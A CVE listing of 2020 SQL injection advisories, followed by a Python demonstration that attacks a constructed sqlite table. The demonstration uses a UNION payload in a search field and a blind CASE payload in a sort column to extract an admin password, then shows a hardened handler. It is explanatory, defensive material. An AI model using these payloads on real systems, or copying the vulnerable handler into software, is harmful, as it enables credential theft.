Total: 9311 CVE
CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 | Description |
---|---|---|---|---|---|---|
CVE-2020-3450 | 1 Cisco | 1 Vision Dynamic Signage Director | 2020-07-22 | 4.0 MEDIUM | 4.9 MEDIUM | A vulnerability in the web-based management interface of Cisco Vision Dynamic Signage Director could allow an authenticated, remote attacker with administrative credentials to conduct SQL injection attacks on an affected system. The vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the web-based management interface and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain data that is stored in the underlying database, including hashed user credentials. To exploit this vulnerability, an attacker would need valid administrative credentials. |
CVE-2020-14982 | 1 Kronos | 1 Web Time And Attendance | 2020-07-22 | 4.0 MEDIUM | 6.5 MEDIUM | A blind SQL injection vulnerability in Kronos WebTA 3.8.x and later before 4.0 (affecting the com.threeis.webta.H352premPayRequest servlet's SortBy parameter) allows an attacker with the Employee, Supervisor, or Timekeeper role to read sensitive data from the database. |
CVE-2020-15052 | 1 Articatech | 1 Artica Proxy | 2020-07-22 | 5.0 MEDIUM | 7.5 HIGH | An issue was discovered in Artica Proxy CE before 4.28.030.418. SQL injection exists via the Netmask, Hostname, and Alias fields. |
CVE-2020-15108 | 1 Glpi-project | 1 Glpi | 2020-07-22 | 4.0 MEDIUM | 7.1 HIGH | In GLPI before 9.5.1, there is a SQL injection in all usages of the "Clone" feature. This has been fixed in 9.5.1. |
CVE-2020-14497 | 1 Advantech | 1 Iview | 2020-07-21 | 7.5 HIGH | 9.8 CRITICAL | Advantech iView, versions 5.6 and prior, contains multiple SQL injection vulnerabilities caused by the use of attacker-controlled strings in the construction of SQL queries. An attacker could extract user credentials, read or modify information, and remotely execute code. |
CVE-2020-5768 | 1 Icegram | 1 Email Subscribers & Newsletters | 2020-07-21 | 4.0 MEDIUM | 4.9 MEDIUM | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in the Icegram Email Subscribers & Newsletters Plugin for WordPress v4.4.8 allows a remote, authenticated attacker to determine the value of database fields. |
CVE-2020-13926 | 1 Apache | 1 Kylin | 2020-07-21 | 7.5 HIGH | 9.8 CRITICAL | Kylin concatenates and executes Hive SQL in the Hive CLI or beeline when building a new segment; part of the HQL comes from system configuration, and that configuration can be overwritten through certain REST APIs, which makes SQL injection possible. Users of all versions after 2.0 should upgrade to 3.1.0. |
CVE-2020-5766 | 1 Srs Simple Hits Counter Project | 1 Srs Simple Hits Counter | 2020-07-20 | 5.0 MEDIUM | 7.5 HIGH | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in the SRS Simple Hits Counter Plugin for WordPress 1.0.3 and 1.0.4 allows a remote, unauthenticated attacker to determine the value of database fields. |
CVE-2020-7577 | 1 Siemens | 1 Opcenter Execution Core | 2020-07-17 | 5.5 MEDIUM | 8.1 HIGH | A vulnerability has been identified in Camstar Enterprise Platform (all versions) and Opcenter Execution Core (all versions < V8.2). Through several vulnerable fields of the application, an authenticated user could perform a SQL injection attack by passing a modified SQL query downstream to the back-end server. Exploitation could be used to read, and potentially modify, application data to which the user has access. |
CVE-2020-11437 | 1 Librehealth | 1 Librehealth Ehr | 2020-07-17 | 4.0 MEDIUM | 4.3 MEDIUM | LibreHealth EMR v2.0.0 is affected by SQL injection allowing low-privilege authenticated users to enumerate the database. |
CVE-2020-15008 | 1 Connectwise | 1 Connectwise Automate | 2020-07-16 | 6.0 MEDIUM | 7.5 HIGH | A SQL injection exists in the probe code of all ConnectWise Automate versions before 2020.7 or 2019.12. The probe implementation that saves data to a custom table builds dynamic SQL for the insert statement and uses the user-supplied table name with little validation, so the table name can be modified to run arbitrary update commands. Using other SQL injection techniques such as timing attacks, full data extraction is possible as well. Patched in 2020.7 and in a hotfix for 2019.12. |
CVE-2020-3973 | 2 Linux, Vmware | 2 Linux Kernel, Velocloud Orchestrator | 2020-07-15 | 6.5 MEDIUM | 8.8 HIGH | The VeloCloud Orchestrator does not apply correct input validation, which allows blind SQL injection. A malicious actor with tenant access to VeloCloud Orchestrator could enter specially crafted SQL queries and obtain data to which they are not privileged. |
CVE-2020-15504 | 1 Sophos | 1 Xg Firewall Firmware | 2020-07-14 | 7.5 HIGH | 9.8 CRITICAL | A SQL injection vulnerability in the user and admin web interfaces of Sophos XG Firewall v18.0 MR1 and older potentially allows an attacker to run arbitrary code remotely. The fix is built into the re-release of XG Firewall v18 MR-1 (named MR-1-Build396) and the v17.5 MR13 release. All other versions >= 17.0 have received a hotfix. |
CVE-2020-13993 | 1 Mods-for-hesk | 1 Mods For Hesk | 2020-07-14 | 5.0 MEDIUM | 7.5 HIGH | An issue was discovered in Mods for HESK 3.1.0 through 2019.1.0. A blind time-based SQL injection issue allows remote unauthenticated attackers to retrieve information from the database via a ticket. |
CVE-2020-15539 | 1 We-com | 1 Municipality Portal Cms | 2020-07-13 | 7.5 HIGH | 9.8 CRITICAL | SQL injection can occur in We-com Municipality portal CMS 2.1.x via the cerca/ keywords field. |
CVE-2020-9483 | 1 Apache | 1 Skywalking | 2020-07-10 | 5.0 MEDIUM | 7.5 HIGH | Resolved: when H2/MySQL/TiDB is used as Apache SkyWalking storage, the metadata query through the GraphQL protocol contains a SQL injection vulnerability that allows access to unexpected data. The Apache SkyWalking 6.0.0 to 6.6.0 and 7.0.0 H2/MySQL/TiDB storage implementations do not set SQL parameters in the appropriate way. |
CVE-2020-15072 | 1 Phplist | 1 Phplist | 2020-07-10 | 6.5 MEDIUM | 8.8 HIGH | An issue was discovered in phpList through 3.5.4. An error-based SQL injection vulnerability exists via the Import Administrators section. |
CVE-2020-8520 | 1 Phpzag | 1 Phpzag | 2020-07-09 | 7.5 HIGH | 9.8 CRITICAL | SQL injection in the order and column parameters of Records.php in the phpzag "live add edit delete data tables records with ajax php mysql" script. |
CVE-2020-8519 | 1 Phpzag | 1 Phpzag | 2020-07-09 | 7.5 HIGH | 9.8 CRITICAL | SQL injection in the search parameter of Records.php in the phpzag "live add edit delete data tables records with ajax php mysql" script. |
CVE-2020-8521 | 1 Phpzag | 1 Phpzag | 2020-07-09 | 7.5 HIGH | 9.8 CRITICAL | SQL injection in the start and length parameters of Records.php in the phpzag "live add edit delete data tables records with ajax php mysql" script. |
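Several entries above share one shape: a paginated, sortable listing endpoint whose search, sort column, sort direction, start and length parameters are concatenated into the query (the phpzag Records.php entries and the Kronos SortBy entry are the clearest cases, and the ConnectWise table-name entry is the same class of identifier injection). The sketch below is an added example written for this page in Python with sqlite3; it is not code from any product in the table, and the schema, rows, and the `admin`/`s3cret` credential are constructed. It shows a UNION dump through the search value, a boolean-based blind leak through the sort column, and a hardened version of the same handler.

```python
import sqlite3
import string

# Constructed sample schema and rows for this example; they are not taken from
# any product listed in the table above.
SCHEMA = """
CREATE TABLE employees (id INTEGER PRIMARY KEY, name TEXT, email TEXT);
INSERT INTO employees VALUES (1, 'Carol', 'a@example.test'),
                             (2, 'Alice', 'c@example.test'),
                             (3, 'Bob',   'b@example.test');
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret');
"""

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def records_vulnerable(conn, search, column, order, start, length):
    """DataTables-style handler: every request parameter is concatenated into SQL."""
    sql = (f"SELECT id, name, email FROM employees WHERE name LIKE '%{search}%' "
           f"ORDER BY {column} {order} LIMIT {start}, {length}")
    return conn.execute(sql).fetchall()

def dump_users_via_search(conn):
    """UNION through the search box; the trailing comment swallows the rest of
    the original statement (ORDER BY and LIMIT included)."""
    payload = "' UNION SELECT id, username, password FROM users -- "
    return records_vulnerable(conn, payload, "name", "asc", 0, 10)

def leak_password_char_via_sort(conn, position):
    """Boolean-based blind inference through the sort column. A true condition
    sorts by name (Alice, id 2, comes first); a false one sorts by email (Carol,
    id 1, comes first), so the id of the first row leaks one answer per request."""
    for ch in string.ascii_lowercase + string.digits:
        payload = (f"(CASE WHEN (SELECT substr(password,{position},1) FROM users "
                   f"WHERE username='admin')='{ch}' THEN name ELSE email END)")
        rows = records_vulnerable(conn, "", payload, "ASC", 0, 1)
        if rows and rows[0][0] == 2:
            return ch
    return None

ALLOWED_SORT_COLUMNS = ("id", "name", "email")
MAX_PAGE = 100

def records_hardened(conn, search, column, order, start, length):
    """Same endpoint with each parameter handled according to its kind:
    identifiers and keywords are allow-listed, page bounds are integers, and
    the search value is bound as a parameter."""
    if column not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    direction = {"asc": "ASC", "desc": "DESC"}.get(str(order).lower())
    if direction is None:
        raise ValueError(f"unsupported sort direction: {order!r}")
    try:
        start, length = int(start), int(length)
    except (TypeError, ValueError):
        raise ValueError("start and length must be integers") from None
    if start < 0 or not 1 <= length <= MAX_PAGE:
        raise ValueError("start or length out of range")
    # Escape LIKE metacharacters so the search value cannot become a wildcard.
    escaped = search.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = (f"SELECT id, name, email FROM employees WHERE name LIKE ? ESCAPE '\\' "
           f"ORDER BY {column} {direction} LIMIT ? OFFSET ?")
    return conn.execute(sql, (f"%{escaped}%", length, start)).fetchall()

def hardened_rejects(conn, search, column, order, start, length):
    """True when records_hardened refuses the request."""
    try:
        records_hardened(conn, search, column, order, start, length)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print("UNION via search:", dump_users_via_search(db))
    print("blind leak, chars 1-2:",
          leak_password_char_via_sort(db, 1), leak_password_char_via_sort(db, 2))
    print("hardened, UNION payload in search:",
          records_hardened(db, "' UNION SELECT 1,2,3 -- ", "name", "asc", 0, 10))
    print("hardened, CASE in sort column rejected:",
          hardened_rejects(db, "", "(CASE WHEN 1=1 THEN name ELSE email END)", "asc", 0, 10))
```

The point the hardened version makes is that parameter binding only covers the search value. A sort column, a sort direction and a table name are identifiers or keywords, which no driver will bind, so they have to be matched against a fixed allow-list before they are spliced into the statement; start and length must be converted to bounded integers rather than passed through as strings.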